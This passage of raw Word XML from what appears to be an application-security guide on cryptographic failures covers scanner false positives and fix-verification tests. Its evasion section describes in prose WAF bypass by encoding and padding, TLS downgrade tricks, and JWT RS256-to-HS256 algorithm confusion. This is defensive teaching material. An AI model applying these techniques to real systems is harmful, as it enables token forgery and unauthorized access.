          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Non-Security Contexts:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B74432">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Scanners flag the use of standard pseudo-random number generators (PRNGs) like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B74432">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>Math.random</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B74432">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B74432">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00B74432">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>rand()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B74432">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> . If the developer is using this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B74432">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>randomness for non-security tasks—such as UI element placement, generating mock data for tests, or driving an AI gaming engine—it is perfectly safe. The scanner, however, cannot distinguish a UI layout randomizer from a session token randomizer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCCC683" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="129"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Custom Signatures and Hashing Wrappers:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> A scanner might flag a custom method like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>hashData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> as insecure if it cannot map it to a standard framework library like Argon2. The application might actually be performing secure hashing on the backend via a remote API microservice, but the local scanner only sees an unverified, generic internal function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE8495C" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="129"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>False Transport Layer Flags (Staging vs. Production):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> DAST scanners often flag a lack of HSTS headers or the presence of weak TLS ciphers when scanning a local staging or QA environment. In reality, these controls are deliberately relaxed for local debugging and are strictly enforced at the production edge proxy/load balancer, which the scanner cannot see.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3353357D"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Manual Verification Tactics (Saving Developer Time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A37BD27" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="130"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Trace the Data Flow (Taint Analysis):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> If a SAST tool flags a weak PRNG or hashing function, manually trace the variable's lifecycle. Check its destination: Does it touch cookies, session identifiers, password storage, or URL parameters? If the output stays contained within an isolated, non-sensitive business logic loop, mark it as a false positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6760323E" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="130"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Inspect the Build Pipeline:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Verify whether the flagged code is actually bundled into the final build artifact. Check your build configurations (e.g., Webpack, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>ProGuard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>, Maven) to see if the insecure code belongs to an uncompiled test folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707473C0" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="130"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Black-Box Environment Audits:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use specialized transport tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>testssl.sh</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>ssllabs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>-scan</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> directly against the live environment staging mirrors to verify if edge routing controls (like HSTS and cipher suite restrictions) are handling security at the network layer, rendering application-level scanner complaints irrelevant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8976EC" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Evasion Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA42469"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Advanced threat actors manipulate data inputs, abuse structural quirks in parser engines, and exploit protocol behaviors to slip past surface-level detection mechanisms like Web Application Firewalls (WAFs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4615A078"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1. WAF Regex Evasion via Encoding Anomalies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B9EAA5"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 xml:space="preserve">Many basic WAFs use regular expressions to spot clear-text patterns or obvious hex strings associated with known attack vectors (e.g., hunting for standard JWT headers or baseline cryptographic errors). </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Attackers</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> bypass these by mutating the transport format:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656B879E" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Nested/Alternative Encoding:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attackers compress payloads using multi-byte character sets, URL double-encoding, or mixing hex and base64 structures that the WAF fails to normalize but the backend application's parser successfully decodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693EA3C5" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Whitespace and JSON/XML Padding:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Headless API parsers are highly tolerant of formatting anomalies. An attacker can inject arbitrary whitespace characters, </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">comments, or non-standard Unicode escape characters ( </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>\u0020</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) into an API payload (like a modified cryptographic header parameter). This disrupts the linear regex pattern matching of a WAF while remaining perfectly valid to the backend JSON interpreter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231DA192"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2. Protocol and Cipher Downgrade Smuggling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CC322F"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Instead of fighting an active firewall rule directly, attackers force the environment to downgrade its security posture so it stops inspecting or blocking malicious traffic altogether.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAE0E3E" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>TLS SNI Spoofing &amp; Protocol Downgrades:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> By manipulating the Server Name Indication (SNI) extension or sending modified </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>ClientHello</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> handshake packets, attackers attempt to trick legacy load balancers into dropping the connection down to an unencrypted or weakly encrypted channel (like TLS 1.0 or an export-grade null cipher suite). Once down, the WAF can no longer inspect the encrypted contents, allowing the attacker to clear-text exploit application layer flaws.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666519D7"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3. Exploding Algorithm Parameter Variations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9D4B95"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When targeting token validation mechanisms (such as JWT parsing components), attackers exploit asymmetric parser logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60698458" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="133"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Asymmetric Algorithm Confusion:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> If an API endpoint expects an asymmetric key pair (like RS256, which uses a public key to verify and a private key to sign), an attacker can manually switch the token header algorithm value to a symmetric cipher mode ( </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>HS256</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B070F6A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="133"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">They then sign the forged token using the application's </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> key (which is often completely public or easily discoverable). If the backend validation engine lacks strict parameter checking, it uses the public key as the symmetric secret key, validating the attacker's forged token as authentic. Because a WAF only looks for a structurally </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>wellformed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> token, it allows the malicious transaction straight through to the backend server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E7417A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Verification &amp; Compliance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC7DBB6" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Fix Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3044884B"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To confidently verify that a cryptographic failure has been successfully resolved and to prevent regressions in future code deployments, security and development teams should implement a multi-layered testing strategy combining unit tests, integration tests, and automated infrastructure checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502D8168"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1. Unit Testing for Secure Primitives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCA5CA7"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 xml:space="preserve">Developers should write deterministic test cases that validate </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>that weak algorithms</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> are blocked and secure defaults are programmatically enforced within the application logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5165C1" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Password Hashing Enforcer Test:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Write a test case that intercepts the output of the user registration or password reset service and asserts that the resulting string matches the expected signature of the new adaptive algorithm (e.g., verifying the </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>$argon2id$</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> prefix) rather than legacy MD5 or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>bcrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> outputs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB99D51" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="134"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>CSPRNG Invalidation Test:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Create a unit test that instantiates the random generation utility and runs a basic frequency or distribution check. Ensure that any usage of nonsecure classes (like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>java.util.Random</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or Python's </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>random</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) inside authentication routines fails the build pipeline immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED4FE2D"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2. Integration and Framework Regression Tests</w:t>
      </w:r>
    </w:p>
